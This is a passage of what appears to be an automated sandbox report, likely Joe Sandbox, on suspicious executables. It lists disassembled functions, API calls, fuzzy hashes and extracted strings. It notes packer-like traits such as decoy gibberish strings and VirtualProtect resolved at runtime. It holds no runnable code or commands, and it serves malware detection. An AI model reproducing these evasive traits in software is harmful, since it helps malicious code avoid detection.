Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: bb4abd3c554aa761655c028907f2dd0f42b46909767c00c01dd86d64fd412c06
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 1A5162B1D40309AAEF11DFA1DC86FEEBBB9EB04704F104025F905B65C0DB75AA059BA4

Function 0200F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0200F4B7
__CxxThrowException@8.LIBCMT ref: 0200F4E2
__CxxThrowException@8.LIBCMT ref: 0200F504
__CxxThrowException@8.LIBCMT ref: 0200F535
_memset.LIBCMT ref: 0200F554
__CxxThrowException@8.LIBCMT ref: 0200F57A
_sprintf.LIBCMT ref: 0200F594

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 4f4e0d5d2ee24757aa7e7009e4d70e7029bf729b833775b964febbc1094d90f3
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: E2514271E40309ABEF21DFA1DC85FEEBBB9FB08705F100129EA05B65C0DB7469059BA4

Function 004A7796 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32(vobarigawekowoxilinifur,00000000,?,00000000), ref: 004A77D0
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004A77EA
HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 004A7808
SetFileShortNameA.KERNEL32(00000000,ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi), ref: 004A7814

Strings

vobarigawekowoxilinifur, xrefs: 004A77CB
ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi, xrefs: 004A780E

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
String ID: vobarigawekowoxilinifur$ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi
API String ID: 4071102102-3876065148
Opcode ID: 8760816cc998bdfbdd5e39e83e3124332d60a725e50a4bdf52e1ef8e9766b2bc
Instruction ID: e7bf0dbb7ed17877254e05ca546f2dd8197638464256ca5c76e718710d91db8c
Opcode Fuzzy Hash: 8760816cc998bdfbdd5e39e83e3124332d60a725e50a4bdf52e1ef8e9766b2bc
Instruction Fuzzy Hash: 8D015E75508104ABD720AB79ED85D6F3BBCE7AB715B00013EF601D2152DA785845CA6D

Function 0204208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 020420C6
__invoke_watson.LIBCMT ref: 02042120
_strlen.LIBCMT ref: 020420D4

Part of subcall function 02025BA8: __getptd_noexit.LIBCMT ref: 02025BA8

_strnlen.LIBCMT ref: 0204215F
__lock.LIBCMT ref: 02042170
__getenv_helper_nolock.LIBCMT ref: 0204217B

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 56f9e733c3e07d67e6effd62540622fa5ea74881e611b0701798d4678aa0f495
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: 6B3105B2B003256FDB626B689C00BEE67E59F05B64F118436FD04EB294DF749444EAA1

Function 00405D99 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00405DA5

Part of subcall function 00404D73: __getptd_noexit.LIBCMT ref: 00404D76
Part of subcall function 00404D73: __amsg_exit.LIBCMT ref: 00404D83

__amsg_exit.LIBCMT ref: 00405DC5
__lock.LIBCMT ref: 00405DD5
InterlockedDecrement.KERNEL32(?), ref: 00405DF2
InterlockedIncrement.KERNEL32(021E2C88), ref: 00405E1D

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 8c9547458fd7c424843e330023cdc540895f6a26820e5d3a19e3b59fdc0a9e85
Instruction ID: a786bc2395a33695c01f39912e35e9194cb072813b2b01bf5b096d5615f318c8
Opcode Fuzzy Hash: 8c9547458fd7c424843e330023cdc540895f6a26820e5d3a19e3b59fdc0a9e85
Instruction Fuzzy Hash: 9F018E31D01A1197C721AB25980A75F7A60FF01714F14443FE850B76D1CB3C6A828FDE

Function 004010AD Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 004010CB

Part of subcall function 00402742: __mtinitlocknum.LIBCMT ref: 00402758
Part of subcall function 00402742: __amsg_exit.LIBCMT ref: 00402764
Part of subcall function 00402742: EnterCriticalSection.KERNEL32(00402543,00402543,?,004034AD,00000004,004A95C8,0000000C,004065F7,0040102A,00402552,00000000,00000000,00000000,?,00404D25,00000001), ref: 0040276C

___sbh_find_block.LIBCMT ref: 004010D6
___sbh_free_block.LIBCMT ref: 004010E5
HeapFree.KERNEL32(00000000,0040102A,004A9540,0000000C,00402723,00000000,004A95A8,0000000C,0040275D,0040102A,00402543,?,004034AD,00000004,004A95C8,0000000C), ref: 00401115
GetLastError.KERNEL32(?,004034AD,00000004,004A95C8,0000000C,004065F7,0040102A,00402552,00000000,00000000,00000000,?,00404D25,00000001,00000214), ref: 00401126

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 588c8c0e739328054b6b1d81dd52dce8de64d9b0d652276143a2e915c3a22438
Instruction ID: e3ad2658be1029a6c764e3d4744d99799671117a589aa33a50f22843976d0029
Opcode Fuzzy Hash: 588c8c0e739328054b6b1d81dd52dce8de64d9b0d652276143a2e915c3a22438
Instruction Fuzzy Hash: 3A01A231C01211AADF246FB29C4AB5E3AA4AF05729F10413FF654BA1E1DBBC89418A5D

Function 02012670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 020126DB
_memset.LIBCMT ref: 02012A30
_memset.LIBCMT ref: 02012AC0

Strings

D, xrefs: 02012AC8

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 3dd1763ac988cc9bbe8bb0ae704bfc0d43802893537fab9ca488f1df832af0a5
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 1DE17D71D00329AFCF65DBA0CD89FEEBBB8BF04304F14416AE909A6190EB746A45DF54

Function 0200D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0200D8EA

Strings

, xrefs: 0200DADB
(, xrefs: 0200DAE9
$, xrefs: 0200DAE2

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: e6b15b48d838cf230650dfb61c162e72093003efd4e4ef6aad54030f5ce3202b
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 88918971D00318EAEF21CBA0C899BEEBBB5EF05308F244169D405772D1DBB65A48DF65

Function 004A753B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(004BB098), ref: 004A7607
GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 004A7644

Strings

VirtualProtect, xrefs: 004A760D
, xrefs: 004A758D

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: $VirtualProtect
API String ID: 1646373207-947944765
Opcode ID: c7654210ef0568af384c7d2d1ae89fb6b1a96c87cdc3f7fb31b294fc344601fc
Instruction ID: 7911a0c501cc7c5b72b9ded86d1bfadf4d461cded8068154810029e3547306ad
Opcode Fuzzy Hash: c7654210ef0568af384c7d2d1ae89fb6b1a96c87cdc3f7fb31b294fc344601fc
Instruction Fuzzy Hash: 95314B15D5C3C0DDE7019BA8BC057223F91EB2BB14F54056ADA958F6B1D3FA0548836F

Function 0201A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0201A858
_memset.LIBCMT ref: 0201A869
_memset.LIBCMT ref: 0201A87A

Strings

p2Q, xrefs: 0201A882

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 2f450aafcc22c80136379177a3196d49f0de62dd1d3456c31dd77554acbaca54
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: B5F0ED78698760A5F7217750BC26BC57E91BB31B08F504089E1182E2E1E3FD238CA79A

Function 0204FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0204FBF1

Part of subcall function 0203169C: std::exception::_Copy_str.LIBCMT ref: 020316B5

__CxxThrowException@8.LIBCMT ref: 0204FC06

Strings

TeM, xrefs: 0204FBFE
TeM, xrefs: 0204FBE7, 0204FBFB

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
String ID: TeM$TeM
API String ID: 3662862379-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: a37236c19aeecff556aae269c3101bce6aa96d8f075e79322644cc6993c22e01
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: F1D06775D0030CBBCB01EFA5D459CDDBBBDAB04344B008466A91897241EB74A3499F98

Function 0200D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 0202197D: __wfsopen.LIBCMT ref: 02021988

_fgetws.LIBCMT ref: 0200D15C

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: d6404e8382a79ea1550d9833fa0836424068f3d9dfe46fd0d84d3b59360bd9bd
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: EB918F71D00319ABEB61DFA4CCC47EEB7F5EF14314F14052AE815A3280E775AA18DBA5

Function 0200D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0200D77E
_malloc.LIBCMT ref: 0200D7B2
_malloc.LIBCMT ref: 0200D7C1
_fprintf.LIBCMT ref: 0200D815

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: 1cec3819269daf3d9cd310b136d0779eb88b874f17f959f1142a3b0a98880aed
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: B7A17EB0C00358EBEF11EBE4CC49BDEBB76AF14304F140129D80576291E7B65A48EFA6

Function 02022AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 02022B2E
__read_nolock.LIBCMT ref: 02022BFE
__filbuf.LIBCMT ref: 02022C21
_memset.LIBCMT ref: 02022C65

Part of subcall function 02025BA8: __getptd_noexit.LIBCMT ref: 02025BA8

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: 0ef24f9d2149ddcffc2d2ca81b3006451615dc13f1ce8983ae50ecbfb56b7e26
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: 24519370A003259FDB2B8FF988846AE77F5AF40324F24872BEC35962D0D7719958EB40

Function 0040818E Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004081C2
__isleadbyte_l.LIBCMT ref: 004081F6
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00408227
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 00408295

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: de10e71cb0db39fb3c86d3bea37f8cc85f6418dccf30b4602a10169084c52059
Instruction ID: bcccdbddf6edb5e33cd8d9b62f485cae4394b5f7b34a4144a4775fce7ab85355
Opcode Fuzzy Hash: de10e71cb0db39fb3c86d3bea37f8cc85f6418dccf30b4602a10169084c52059
Instruction Fuzzy Hash: CA31BF31600245EFCB20DFA4CA849AA3BA5BF41350F1945BEE4A1AB2D1DB34DD41DB59

Function 02041359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0204137D

Part of subcall function 02041A9D: __fltout2.LIBCMT ref: 02041AC6

__cftog_l.LIBCMT ref: 020413A3
__cftoe_l.LIBCMT ref: 020413D5

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 6b1351320ee23c9882e504425b1e1a1d0e27601fcdc01807ef37a617fe83cfa5
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: 5D013DB244024ABBCF125E84DD418ED7FA2BB59359B488425FA5D58420DB36C5B1BB81

Function 020C7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 020C7A4B

Part of subcall function 020C8140: ___BuildCatchObjectHelper.LIBCMT ref: 020C8172
Part of subcall function 020C8140: ___AdjustPointer.LIBCMT ref: 020C8189

_UnwindNestedFrames.LIBCMT ref: 020C7A62
___FrameUnwindToState.LIBCMT ref: 020C7A74
CallCatchBlock.LIBCMT ref: 020C7A98

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: f49a59bdaa8076a267971fd3a46deccffd225bf6db1e3c7494e3881d672ceb1b
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: 9101D772000209BBCF52AF55CC00EDE7BAAEF88754F258118FE1865121D732E961EFA4

Function 00406505 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00406511

Part of subcall function 00404D73: __getptd_noexit.LIBCMT ref: 00404D76
Part of subcall function 00404D73: __amsg_exit.LIBCMT ref: 00404D83

__getptd.LIBCMT ref: 00406528
__amsg_exit.LIBCMT ref: 00406536
__lock.LIBCMT ref: 00406546

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: a03eb32cb70a6cb46d4868c1b96f2a616ac8865678845852469dfd5624f2b2f3
Instruction ID: 43108a7cdec2e78bfd7abe1ba0d6f54392799be5e27be97f5d84fb845fd98235
Opcode Fuzzy Hash: a03eb32cb70a6cb46d4868c1b96f2a616ac8865678845852469dfd5624f2b2f3
Instruction Fuzzy Hash: C1F09631D407109BD710BB79A806B4D7790AF00728F11417FE841B72D6CB7C5911CA9E

Analysis Process: NoCZBiPwAcSyoDte_ne2sJt7.exePID: 2872, Parent PID: 7008COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	48
Total number of Limit Nodes:	1

Executed Functions

Function 05E9F138 Relevance: 24.2, Strings: 19, Instructions: 448
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 05E9F3FD
87TA, xrefs: 05E9F679
;, xrefs: 05E9F35A
b, xrefs: 05E9F391
|,tB, xrefs: 05E9F2F5
=, xrefs: 05E9F295
a, xrefs: 05E9F4B6
I, xrefs: 05E9F5EF
P, xrefs: 05E9F309
C, xrefs: 05E9F3A2
%, xrefs: 05E9F31B
Z, xrefs: 05E9F730
E, xrefs: 05E9F520
), xrefs: 05E9F591
_, xrefs: 05E9F61A
V, xrefs: 05E9F2FF
', xrefs: 05E9F71A
a, xrefs: 05E9F656
], xrefs: 05E9F46C

Memory Dump Source

Source File: 0000000B.00000002.2378369629.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: $%$'$)$87TA$;$=$C$E$I$P$V$Z$]$_$a$a$b$|,tB
API String ID: 0-1020955577
Opcode ID: 0b98a8e5769bf5ed1f29e5828bc2bf4a5175582609000539c6afeeafe3033c94
Instruction ID: 0edfbe74e964b03e73e26ced24ec42492dd0b6090a8ca4897c52c3856681eca3
Opcode Fuzzy Hash: 0b98a8e5769bf5ed1f29e5828bc2bf4a5175582609000539c6afeeafe3033c94
Instruction Fuzzy Hash: 23327EB1E016698FEB64DF2AC9447D9BBF2FF88300F1481EAD40CAB254DB755A818F40

Function 03697BF9 Relevance: 24.2, Strings: 19, Instructions: 447
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b, xrefs: 03697E53
E, xrefs: 03697FE2
), xrefs: 03698059
|,tB, xrefs: 03697DC0
I, xrefs: 036980C0
%, xrefs: 03697DE3
, xrefs: 03697EB9
P, xrefs: 03697DD1
a, xrefs: 03697F72
', xrefs: 036981E2
V, xrefs: 03697DCA
Z, xrefs: 036981F8
a, xrefs: 03698124
=, xrefs: 03697D60
87TA, xrefs: 03698147
], xrefs: 03697F2B
;, xrefs: 03697E1C
_, xrefs: 036980E8
C, xrefs: 03697E67

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: $%$'$)$87TA$;$=$C$E$I$P$V$Z$]$_$a$a$b$|,tB
API String ID: 0-1020955577
Opcode ID: dbdb5c6e8e314d45ca5e430926ea952e2f1cec0c5f23d1805593d825552414cf
Instruction ID: 4a7cfa97c15e9f0e6311bae8c3b2d6d3450687a8ddccb314e56c2ad525474bce
Opcode Fuzzy Hash: dbdb5c6e8e314d45ca5e430926ea952e2f1cec0c5f23d1805593d825552414cf
Instruction Fuzzy Hash: B3429CB4D016298FEB64CF2AD9847D9BBB2FB88300F1081EAD40CAB255DB755E81CF41

Function 03697C08 Relevance: 24.2, Strings: 19, Instructions: 439
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b, xrefs: 03697E53
E, xrefs: 03697FE2
), xrefs: 03698059
|,tB, xrefs: 03697DC0
I, xrefs: 036980C0
%, xrefs: 03697DE3
, xrefs: 03697EB9
P, xrefs: 03697DD1
a, xrefs: 03697F72
', xrefs: 036981E2
V, xrefs: 03697DCA
Z, xrefs: 036981F8
a, xrefs: 03698124
=, xrefs: 03697D60
87TA, xrefs: 03698147
], xrefs: 03697F2B
;, xrefs: 03697E1C
_, xrefs: 036980E8
C, xrefs: 03697E67

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: $%$'$)$87TA$;$=$C$E$I$P$V$Z$]$_$a$a$b$|,tB
API String ID: 0-1020955577
Opcode ID: dbeceb9d10774d9fab688f318b93274b793d4cdbd832f92df3aaac3d22f8ffd5
Instruction ID: 4f901572bf4936e1e36815e353fee7c9b4ed74409fc1ae626faed30e547f8690
Opcode Fuzzy Hash: dbeceb9d10774d9fab688f318b93274b793d4cdbd832f92df3aaac3d22f8ffd5
Instruction Fuzzy Hash: A1429CB4D016298FEB64CF2AD9847D9BBB2FB88300F1081EAD40CAB355DB755E818F41

